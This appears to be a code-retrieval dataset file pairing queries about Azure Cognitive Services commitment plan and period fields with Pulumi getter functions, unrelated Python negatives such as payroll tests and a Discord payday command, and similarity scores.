The location of the commitment plan.
def commitment_plan_location(self) -> Optional[str]: return pulumi.get(self, "commitment_plan_location")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def commitment_plan_id(self) -> Optional[str]:\n return pulumi.get(self, \"commitment_plan_id\")", "def plan(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"plan\")", "def _course_location(self):\r\n return \"location:{org}+{number}+{run}+course+{run}\".format(**self._course_dict)", "def plan(self):\n return read_small_file(self.homeDirectory + \"/.plan\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return pulumi.get(self, \"location\")", "def location(self) -> str:\n return self.__location", "def location(self) -> str:\n return self.__location", "def location(self) -> str:\n return self.__location", "def cal_location(self):\n return self.setup_location.name", "def get_absolute_url(self):\n return reverse('plan_proposal',\n kwargs = {'project_name': self.project.slug,\n 'proposal_name': self.slug})", "def location(self) -> str:\n return self._location", "def __init__(__self__, *,\n commitment_plan_id: Optional[str] = None,\n commitment_plan_location: Optional[str] = None):\n if commitment_plan_id is not None:\n pulumi.set(__self__, \"commitment_plan_id\", commitment_plan_id)\n if commitment_plan_location is not None:\n pulumi.set(__self__, \"commitment_plan_location\", commitment_plan_location)", "def get_plan(self):\n sub = self.get_subscription()\n return sub.plan", "def location(self) -> str:\n return self.metadata.location", "def location(self):\n location = self.args.get('location')\n if not location:\n raise JalBotError('Missing required argument -l|-location')\n return location", "def cal_location(self):\n return self.location.name", "def plan(self):\n\n plan = f\"\"\"\n Input parameters: {self.params}\n Product: {self.product}\n\n Source code:\n {self.source_code}\n \"\"\"\n\n print(plan)", "def plan_id(self) -> str:\n return self._plan_id" ]
[ "0.6826332", "0.6241266", "0.61446285", "0.60929376", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60332566", "0.60002583", "0.60002583", "0.60002583", "0.5996172", "0.5973236", "0.5964412", "0.5941589", "0.5926451", "0.5905032", "0.5895706", "0.5864075", "0.5858786", "0.5854414" ]
0.8788695
0
Cognitive Services account commitment period.
def last(self) -> 'outputs.CommitmentPeriodResponse': return pulumi.get(self, "last")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def current(self) -> Optional['outputs.CommitmentPeriodResponse']:\n return pulumi.get(self, \"current\")", "def get_period_guarantee_advance(self):\n return ceiling(self.scheduled_completion, 3)", "def current_effective_deadline(cls) -> float:", "def next(self) -> Optional['outputs.CommitmentPeriodResponse']:\n return pulumi.get(self, \"next\")", "def checkpoint_period_get(self):\n raise Exception(\"TODO\")", "def update_period(self):\n return 0.1", "async def payday(self, ctx: commands.Context):\r\n author = ctx.author\r\n guild = ctx.guild\r\n\r\n cur_time = calendar.timegm(ctx.message.created_at.utctimetuple())\r\n credits_name = await bank.get_currency_name(ctx.guild)\r\n if await bank.is_global(): # Role payouts will not be used\r\n\r\n # Gets the latest time the user used the command successfully and adds the global payday time\r\n next_payday = (\r\n await self.config.user(author).next_payday() + await self.config.PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n try:\r\n await bank.deposit_credits(author, await self.config.PAYDAY_CREDITS())\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}!\"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n # Sets the current time as the latest payday\r\n await self.config.user(author).next_payday.set(cur_time)\r\n\r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"Here you go, {author.name}. \"\r\n \"Don't spend it too quickly!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the **global** leaderboard!\\n\"\r\n \"Use `dem leaderboard` to review your position further.\\n\"\r\n \"Use `dem slot <bid>` to take a gamble at the slot machine!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n\r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )\r\n else:\r\n\r\n # Gets the users latest successfully payday and adds the guilds payday time\r\n next_payday = (\r\n await self.config.member(author).next_payday()\r\n + await self.config.guild(guild).PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n credit_amount = await self.config.guild(guild).PAYDAY_CREDITS()\r\n for role in author.roles:\r\n role_credits = await self.config.role(\r\n role\r\n ).PAYDAY_CREDITS() # Nice variable name\r\n if role_credits > credit_amount:\r\n credit_amount = role_credits\r\n try:\r\n await bank.deposit_credits(author, credit_amount)\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}! 
\"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n\r\n # Sets the latest payday time to the current time\r\n next_payday = cur_time\r\n\r\n await self.config.member(author).next_payday.set(next_payday)\r\n \r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"{author.mention} Take a loada' cash. \"\r\n \"Don't spend it took quick!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the server leaderboard!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n \r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )", "def expirePeriodInSeconds(self)->int:\n return self._lic.params['periodInSeconds'].value", "def account_changes(self, since_transaction_id: SinceTransactionID = sentinel):\n pass", "def circulation_upcoming_return_range():\n return arrow.utcnow() + timedelta(\n days=current_app.config[\"ILS_UPCOMING_RETURN_RANGE\"])", "def committees(self):\n print(\"Scheduling a refresh of committees\")\n if not self.background_scheduler.get_job('committees'):\n self.background_scheduler.add_job(Refresh.committees,\n 'cron',\n id='committees',\n name='committees',\n day='last fri')\n self._start()", "def renewal_period(self) -> Optional[float]:\n return pulumi.get(self, \"renewal_period\")", "def period(self) -> int:", "def __init__(self):\n import datetime as dt\n import dateutil as du\n from dateutil import relativedelta\n\n #Initial date calculations\n self.right_now = dt.datetime.utcnow()\n self.beginDelta = -2\n self.endDelta = 365\n self.timeDeltaCashBegin = du.relativedelta.relativedelta(months=self.beginDelta)\n self.timeDeltaCashEnd = dt.timedelta(days=self.endDelta)\n self.begin_date = self.right_now + self.timeDeltaCashBegin\n self.end_date = self.right_now + self.timeDeltaCashEnd\n\n #today's date to initialize the Cash event\n self.today_date = str(dt.datetime.date(self.right_now))\n\n #time variable for event creation // included date list to decipher cash update days\n self.create_begin = dt.datetime.fromisoformat(self.right_now.date().isoformat()).isoformat() + 'Z'\n self.create_end = self.end_date.isoformat() + 'Z'\n self.create_duration = (self.end_date - self.right_now).days\n self.iterate_days = self.iterateList(self.create_duration)\n\n #time variables used in deletion code\n self.clear_begin = self.begin_date.isoformat() + 'Z'\n self.clear_end = self.end_date.isoformat() + 'Z'\n\n #Smaller size for event creation/deleting testing\n self.test_duration = 40\n self.test_days = self.iterateList(self.test_duration)\n \n #Store old event list to check if changes need to be made\n self.check_for_updates = []\n self.cash_history = []\n\n self.creds = self.getUsrCreds()\n self.service = self.buildAPICal(self.creds)\n self.usrCals = self.getUsrCals(self.service)\n\n 
#Check if Calendar is Present and get the details -- if not, build one\n if self.checkCashCal(self.usrCals) == False:\n self.usr_csh_id, self.usr_csh_cal = self.buildCashCal(self.usrCals)\n else:\n self.usr_csh_id = self.getCshID(self.usrCals)\n self.usr_csh_cal = self.getCshCal(self.usrCals)", "def get_period(self):\n raise NotImplementedError('Agent is an abstract base class')", "def utility_lifetime(self, utility_today, utility_future):\n return utility_today + self.beta * utility_future", "def test_finalize_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with no over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee2.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('300.00'), employee_payment.earnings)", "def test_calculate_contract_duration():\n assert calculate_contract_duration(\n parse('2020-01-01'), parse('2020-03-31')\n ) == relativedelta(months=+2, days=+30)", "def return_account_balance(self, date_cursor=None):\n\n logger.info(\"Running return_account_balance for policy %s\" % self.policy.id)\n\n if not date_cursor:\n date_cursor = datetime.now().date()\n\n invoices = Invoice.query.filter_by(policy_id=self.policy.id)\\\n .filter(Invoice.bill_date <= date_cursor)\\\n .order_by(Invoice.bill_date)\\\n .all()\n logger.info(str(len(invoices)) + \" invoices queried from database for policy %s\" % self.policy.id)\n\n due_now = 0\n for invoice in invoices:\n due_now += invoice.amount_due\n\n payments = Payment.query.filter_by(policy_id=self.policy.id)\\\n .filter(Payment.transaction_date <= date_cursor)\\\n .all()\n logger.info(str(len(payments)) + \" payments queried from database for policy %s\" % self.policy.id)\n\n for payment in payments:\n due_now -= payment.amount_paid\n\n return due_now", "def expiration(self):\n return datetime(int(self.exp_year), int(self.exp_month),\n calendar.monthrange(int(self.exp_year), int(self.exp_month))[1],\n 23, 59, 59)", "def returnDepositsWithdrawals(self,\n start=datetime.now() - timedelta(days=1),\n end=datetime.now()):\n pass", "def pnl(qbo_session, period = \"YEARLY\", start_date=\"first\", end_date=\"last\",\n **kwargs):\n\n pnl_account_types = [\n \n \"Income\", \"Other Income\",\n \"Expense\", \"Other Expense\", \"Cost of Goods Sold\"\n \n ]\n\n \n\n # go through the accounts, collecting a list of those that are \n # pnl accounts\n\n relevant_accounts = []\n\n coa = qbo_session.chart_of_accounts()\n\n AccountType_i = coa[0].index(\"AccountType\")\n fqa_i = coa[0].index(\"FullyQualifiedName\")\n\n for a in coa:\n\n AccountType = a[AccountType_i]\n\n if AccountType in pnl_account_types:\n\n relevant_accounts.append(a[fqa_i])\n \n # now collect 
the ledger_lines that are even relevant to the time\n # period and pnl accounts (and we'll handle presentation last)\n\n relevant_activity = {} #{account:[relevant lines]}\n\n all_ledger_lines = qbo_session.ledger_lines(None, None, None, True,\n **kwargs)\n\n headers = all_ledger_lines[0]\n\n account_i = headers.index(\"account\") \n amount_i = headers.index(\"amount\")\n date_i = headers.index(\"TxnDate\")\n \n earliest_date = datetime(2100,1,1)\n latest_date = datetime(1900,1,1)\n\n for line in all_ledger_lines[1:]:\n\n account = line[account_i]\n line_date = line[date_i]\n\n #first apply the date filter!\n if not start_date == \"first\" and line_date < start_date:\n continue\n \n if not end_date == \"last\" and line_date > end_date:\n continue\n \n #if it's made the cut, we can update the report date bounds\n earliest_date = min(line_date,earliest_date)\n latest_date = max(line_date,latest_date)\n\n #then apply the account filter!\n\n if not account in relevant_activity:\n #then let's confirm that its account type is a pnl one\n \n if not account in relevant_accounts:\n \n continue\n\n else:\n relevant_activity[account] = []\n\n relevant_activity[account].append(line)\n\n #now let's do presentation\n #TODO -- incorporate pandas tables...do only minimal work on it until then\n\n pnl_lines = []\n\n if period == \"YEARLY\":\n\n report_start_date = datetime(earliest_date.year,1,1)\n report_end_date = datetime(latest_date.year,12,31)\n\n period_start_dates = list(rrule(YEARLY, bymonth=1, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonth=12, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date))\n\n elif period == \"MONTHLY\":\n\n report_start_date = datetime(earliest_date.year,\n earliest_date.month,\n 1)\n report_end_date = datetime(latest_date.year,\n latest_date.month,\n calendar.monthrange(latest_date.year,\n latest_date.month)[1])\n\n period_start_dates = list(rrule(MONTHLY, bymonthday=1,\n dtstart=report_start_date,\n until=report_end_date))\n\n period_end_dates = list(rrule(YEARLY, bymonthday=-1,\n dtstart=report_start_date,\n until=report_end_date)) \n\n header_1 = [\"\", \"Period Start -->\"] + period_start_dates\n header_2 = [\"Account\", \"Period End -->\"] + period_end_dates\n\n pnl_lines.append(header_1)\n pnl_lines.append(header_2)\n\n \"\"\"Clearly, there's a way to do this with only one pass of the data...\n let's get that right in the first re-write...probably with pandas\"\"\"\n\n #now let's fill up the pnl_lines with what we know to be the relevant data\n #for now, we'll rely on the knowledge that the data is coming to us in\n #date order, but that should be fixed too...\n\n for account in relevant_activity:\n\n account_row = [account, \"\"] #one value per period \n\n current_period_index = 0 #primitive counter, yes!\n this_period_total = 0 #this will be this period's total\n\n for line in relevant_activity[account]:\n \n line_amount = line[amount_i]\n line_date = line[date_i] \n\n if line_date > period_end_dates[current_period_index]:\n\n account_row.append(this_period_total)\n this_period_total = line_amount\n current_period_index +=1\n\n else:\n \n this_period_total = round(this_period_total +\n line_amount, 2)\n\n \"\"\"super sloppy...\"\"\"\n account_row.append(this_period_total) #for the last period\n current_period_index +=1\n\n while current_period_index < len(period_end_dates):\n account_row.append(0)\n current_period_index +=1\n\n pnl_lines.append(account_row)\n\n return 
pnl_lines", "def test_list_grading_periods_accounts(self):\r\n account_id = None # Change me!!\r\n\r\n r = self.client.list_grading_periods_accounts(account_id)", "def get_deadline(self):\n min_time = self.introduction_time or 0\n return min_time + self.time_slot[0] * self.__period", "def compute_periodpayoff(self):\n logger.debug(u\"{} Period Payoff\".format(self.joueur))\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff = 0\n\n # cumulative payoff since the first period\n if self.currentperiod.EXPERIENCE_NOM_COURT_period < 2:\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n else: \n previousperiod = self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period - 1]\n self.currentperiod.EXPERIENCE_NOM_COURT_cumulativepayoff = \\\n previousperiod.EXPERIENCE_NOM_COURT_cumulativepayoff + \\\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff\n\n # we store the period in the self.periodes dictionnary\n self.periods[self.currentperiod.EXPERIENCE_NOM_COURT_period] = self.currentperiod\n\n logger.debug(u\"{} Period Payoff {}\".format(\n self.joueur,\n self.currentperiod.EXPERIENCE_NOM_COURT_periodpayoff))", "def test_finalize_period_overtime(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period.id})\n self.client.force_login(self.test_user_employer)\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('id'), self.test_period.id, response_json)\n self.assertEqual(response_json.get('employer'), self.test_employer.id, response_json)\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 2)\n # verify amounts, with over_time\n employee_payment = EmployeePayment.objects.get(employer_id=self.test_employer.id,\n employee_id=self.test_employee.id,\n payroll_period_id=self.test_period.id)\n self.assertEqual(employee_payment.earnings, Decimal('360.00') + Decimal('450.00'),\n employee_payment.earnings)", "def deadline(self):\n\n if self.service and self.service.solution_time:\n return self.created + \\\n timedelta(hours=self.service.solution_time) - \\\n timedelta(seconds=self._time_on_hold)\n else:\n return None", "def billing_period(self) -> Optional[str]:\n return pulumi.get(self, \"billing_period\")", "def payment_cycle(self) -> Optional[pulumi.Input['GoogleCloudChannelV1PeriodArgs']]:\n return pulumi.get(self, \"payment_cycle\")", "def test_finalize_and_open_period(self):\n employee_payments_qty = EmployeePayment.objects.filter(employer=self.test_employer).count()\n url = reverse_lazy('api:me-get-single-payroll-period', kwargs={'period_id': self.test_period2.id})\n self.client.force_login(self.test_user_employer)\n # change from OPEN to FINALIZE\n response = self.client.put(url, data={'status': 'FINALIZED'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'FINALIZED', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty + 1)\n # change from FINALIZE to OPEN\n 
response = self.client.put(url, data={'status': 'OPEN'}, content_type='application/json')\n self.assertEqual(response.status_code, 200, response.content.decode())\n response_json = response.json()\n self.assertEqual(response_json.get('status'), 'OPEN', response_json)\n self.assertEqual(EmployeePayment.objects.filter(employer=self.test_employer).count(), employee_payments_qty)" ]
[ "0.5595547", "0.556296", "0.5546404", "0.5526741", "0.52279395", "0.5222263", "0.5204489", "0.51837915", "0.5149062", "0.5121727", "0.5081491", "0.5066678", "0.50160015", "0.5004779", "0.49921027", "0.49675107", "0.49551263", "0.4941851", "0.49270973", "0.49227467", "0.4918205", "0.4911476", "0.49099314", "0.49072093", "0.48913255", "0.48905048", "0.48638746", "0.48467177", "0.48088193", "0.48062244" ]
0.6236221
0
The list of ProvisioningIssue.
def provisioning_issues(self) -> Sequence[str]: return pulumi.get(self, "provisioning_issues")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def get_issues(self) -> [\"AIOGitHubAPIRepositoryIssue\"]:\n _endpoint = f\"/repos/{self.full_name}/issues\"\n\n response = await self.client.get(endpoint=_endpoint)\n return [AIOGitHubAPIRepositoryIssue(self.client, x) for x in response or []]", "def issues(self) -> Iterable[Issue]:\n # Make request\n issues = self.shards_xml(\"issues\")[\"issues\"]\n # Return boxed Issues (may crash badly if authentication failed)\n return [Issue.from_xml(node) for node in issues]", "def issues(self):\r\n return issues.Issues(self)", "def issues(self):\r\n return issues.RepoIssues(self)", "def issues(self):\r\n return issues.RepoIssues(self)", "def get_sprint_board_issues(self) -> list:\n endpoint_path = f'agile/1.0/sprint/{self.sprint}/issue'\n data = {\n 'jql': 'status=\"In Review\"',\n 'fields': ['assignee', 'status', 'summary'],\n }\n response = self._get(endpoint_path, data)\n return self._parser.filter_out_important_data(response)", "def get_product_issues(context, data_dict):\n # noinspection PyUnresolvedReferences\n product_id = _get_or_bust(data_dict, 'productId')\n\n slr = make_connection()\n\n response = json.loads(\n slr.raw_query(\n q='top_parent_id:{pid}'.format(\n pid=product_id\n ),\n group='true',\n group_field='issue_number_int',\n wt='json',\n sort='issue_number_int desc',\n # FIXME: We need to actually paginate on this, but the daily\n # team will not accept it (yet).\n rows='2000000'\n )\n )\n\n issue_no_group = response['grouped']['issue_number_int']\n\n return [{\n 'issue': group['groupValue'],\n 'number_articles': group['doclist']['numFound']\n } for group in issue_no_group['groups']]", "def components(self):\r\n return IssueComponents(self)", "def get_queryset(self):\n queryset = Issue.objects.filter(project_id=self.project.pk)\n return queryset", "def issues(self):\n if self.pull_request.body is not None:\n regex = r\"(?<=closes: #|elated: #)\\d{5}\"\n issue_strs = re.findall(regex, self.pull_request.body)\n self.issue_nums = [eval(s) for s in issue_strs]", "def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]", "def problem_list(self):\r\n return [{\r\n 'location': location, 'problem_name': name,\r\n 'num_graded': self.DUMMY_DATA['problem_list_num_graded'],\r\n 'num_pending': self.DUMMY_DATA['problem_list_num_pending'],\r\n 'num_required': self.DUMMY_DATA['problem_list_num_required']\r\n } for location, name in self.problems.items()\r\n ]", "def list_issues(self, jira_con, search_jql):\n assert jira_con, \"Requires jira_con\"\n assert search_jql, \"Requires search_jql\"\n assert self.log\n dict_keys = ('name', 'percent', 'watchCount', 'votes', 'progress', 'value')\n\n issues = jira_con.search_issues(search_jql + ' order by issue')\n self.log.info('\\nResults for {}:'.format(search_jql))\n for issue in issues:\n s = str(issue)\n for key, value in issue.raw['fields'].iteritems():\n if value:\n found = False\n if type(value) is not dict:\n found = True\n s += ', ' + key + '=' + unicode(value)\n else:\n for k in dict_keys:\n if k in value:\n found = True\n s += ', ' + key + '=' + str(value[k])\n if not found:\n s += ', ' + key + '=(' + unicode(type(value)) + ') ' + str(value)\n self.log.info(s)\n return issues", "def issues_list(self, mar, request):\n if request.additionalProject:\n for project_name in request.additionalProject:\n project = self._services.project.GetProjectByName(\n mar.cnxn, project_name)\n if project and not permissions.UserCanViewProject(\n mar.auth.user_pb, mar.auth.effective_ids, project):\n raise permissions.PermissionException(\n 
'The user %s has no permission for project %s' %\n (mar.auth.email, project_name))\n url_params = [(name, mar.GetParam(name)) for name in\n framework_helpers.RECOGNIZED_PARAMS]\n # TODO(jrobbins): This should go through work_env.\n pipeline = frontendsearchpipeline.FrontendSearchPipeline(\n mar.cnxn, self._services, mar.auth, [mar.me_user_id], mar.query,\n mar.query_project_names, mar.num, mar.start, url_params, mar.can,\n mar.group_by_spec, mar.sort_spec, mar.warnings, mar.errors,\n mar.use_cached_searches, mar.profiler, display_mode=mar.mode,\n project=mar.project)\n if not mar.errors.AnyErrors():\n pipeline.SearchForIIDs()\n pipeline.MergeAndSortIssues()\n pipeline.Paginate()\n else:\n raise endpoints.BadRequestException(mar.errors.query)\n\n issue_list = [\n api_pb2_v1_helpers.convert_issue(\n api_pb2_v1.IssueWrapper, r, mar, self._services)\n for r in pipeline.visible_results]\n return api_pb2_v1.IssuesListResponse(\n kind='monorail#issueList',\n totalResults=pipeline.total_count,\n items=issue_list)", "def retrieve_open_issues(self):\n return self._retrieve_issues(\"open\")", "def test_issue_list_issues(self):\n pass", "def problems(self):\n return self.configuration.problems", "def list_issues(self, interval: str, threat_status: str = None, threat_type: str = None) -> dict:\n params = remove_empty_elements({\"interval\": interval,\n \"threatStatus\": threat_status,\n \"threatType\": threat_type,\n \"format\": \"json\"})\n return self.http_request(\"GET\", '/siem/issues', params=params)", "def get_problems(self):\n\n with self.__orm.session_scope() as session:\n try:\n problems = session.query(Problem.name).all()\n return [problem[0] for problem in problems]\n except NoResultFound:\n return []", "def get_permisos(self):\n return [p for p in self.permisos.all()]", "def _get_problem_list(self):\r\n self._success_response({'problem_list': self.server.problem_list})", "def versions(self):\r\n return IssueVersions(self)", "def comments(self):\r\n return IssueComments(self)", "def comments(self):\r\n return IssueComments(self)", "def labels(self):\r\n return labels.IssueLabels(self)", "def test_issues_list(self):\n response = self.client.get(url_for('issues.issuesresource'))\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.json)", "def get_jira_issues(query):\n jira_issues = []\n defects = []\n count, maxlen = 0, 1\n while count < maxlen:\n issues = jira_client.search_issues(query, startAt=count, maxResults=50, expand='changelog')\n jira_issues.extend(issues)\n count = len(jira_issues)\n maxlen = issues.total\n\n return jira_issues", "def list_issues(self, chat):\n issues = self.url_handler.get_json_from_url(constants.URL_GITHUB)\n msg = ''\n msg += '\\U0001F4CB Issues List\\n\\n'\n for aux in issues:\n msg += \"[[{}]] - {}\\n\\n\".format(str(aux['number']), aux['title'])\n\n self.url_handler.send_message(msg, chat)", "def events(self):\r\n return IssueEvents(self)", "def events(self):\r\n return IssueEvents(self)" ]
[ "0.63413113", "0.6226929", "0.61056864", "0.6073216", "0.6073216", "0.60230535", "0.5824415", "0.57908684", "0.5765761", "0.57227564", "0.56972843", "0.5593333", "0.555865", "0.545716", "0.5440722", "0.54217577", "0.5414522", "0.541265", "0.5391178", "0.5390083", "0.5378608", "0.5321044", "0.5169411", "0.5169411", "0.5160285", "0.51341265", "0.5123277", "0.5120164", "0.5097267", "0.5097267" ]
0.7382787
0
Cognitive Services account commitment period.
def current(self) -> Optional['outputs.CommitmentPeriodResponse']: return pulumi.get(self, "current")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def last(self) -> 'outputs.CommitmentPeriodResponse':\n return pulumi.get(self, \"last\")", "def get_period_guarantee_advance(self):\n return ceiling(self.scheduled_completion, 3)", "def current_effective_deadline(cls) -> float:", "def next(self) -> Optional['outputs.CommitmentPeriodResponse']:\n return pulumi.get(self, \"next\")", "def checkpoint_period_get(self):\n raise Exception(\"TODO\")", "def update_period(self):\n return 0.1", "async def payday(self, ctx: commands.Context):\r\n author = ctx.author\r\n guild = ctx.guild\r\n\r\n cur_time = calendar.timegm(ctx.message.created_at.utctimetuple())\r\n credits_name = await bank.get_currency_name(ctx.guild)\r\n if await bank.is_global(): # Role payouts will not be used\r\n\r\n # Gets the latest time the user used the command successfully and adds the global payday time\r\n next_payday = (\r\n await self.config.user(author).next_payday() + await self.config.PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n try:\r\n await bank.deposit_credits(author, await self.config.PAYDAY_CREDITS())\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}!\"\r\n \"Please spend some more \\N{GRIMACING FACE}\\n\\n\"\r\n \"You currently have {new_balance} {currency}.\"\r\n ).format(\r\n currency=credits_name, new_balance=humanize_number(exc.max_balance)\r\n )\r\n )\r\n return\r\n # Sets the current time as the latest payday\r\n await self.config.user(author).next_payday.set(cur_time)\r\n\r\n pos = await bank.get_leaderboard_position(author)\r\n embed = Embed.create(\r\n self, ctx, title=\"<:dollarbag:778687019944771616> Payday!\",\r\n description=(\r\n \"Here you go, {author.name}. \"\r\n \"Don't spend it too quickly!\\n\\n\"\r\n \"<:plus:777167188816560168> {amount} dollars have been added to your bank.\\n\"\r\n \"You now have {new_balance} dollars. <:dollarbag:778687019944771616>\\n\\n\"\r\n \"You are currently #{pos} on the **global** leaderboard!\\n\"\r\n \"Use `dem leaderboard` to review your position further.\\n\"\r\n \"Use `dem slot <bid>` to take a gamble at the slot machine!\"\r\n ).format(\r\n author=author,\r\n currency=credits_name,\r\n amount=humanize_number(await self.config.PAYDAY_CREDITS()),\r\n new_balance=humanize_number(await bank.get_balance(author)),\r\n pos=humanize_number(pos)\r\n )\r\n )\r\n await ctx.send(embed=embed)\r\n\r\n else:\r\n dtime = self.display_time(next_payday - cur_time)\r\n await ctx.send(\r\n _(\r\n \"{author.mention} Too soon. For your next payday you have to wait {time}.\"\r\n ).format(author=author, time=dtime)\r\n )\r\n else:\r\n\r\n # Gets the users latest successfully payday and adds the guilds payday time\r\n next_payday = (\r\n await self.config.member(author).next_payday()\r\n + await self.config.guild(guild).PAYDAY_TIME()\r\n )\r\n if cur_time >= next_payday:\r\n credit_amount = await self.config.guild(guild).PAYDAY_CREDITS()\r\n for role in author.roles:\r\n role_credits = await self.config.role(\r\n role\r\n ).PAYDAY_CREDITS() # Nice variable name\r\n if role_credits > credit_amount:\r\n credit_amount = role_credits\r\n try:\r\n await bank.deposit_credits(author, credit_amount)\r\n except errors.BalanceTooHigh as exc:\r\n await bank.set_balance(author, exc.max_balance)\r\n await ctx.send(\r\n _(\r\n \"You've reached the maximum amount of {currency}! 
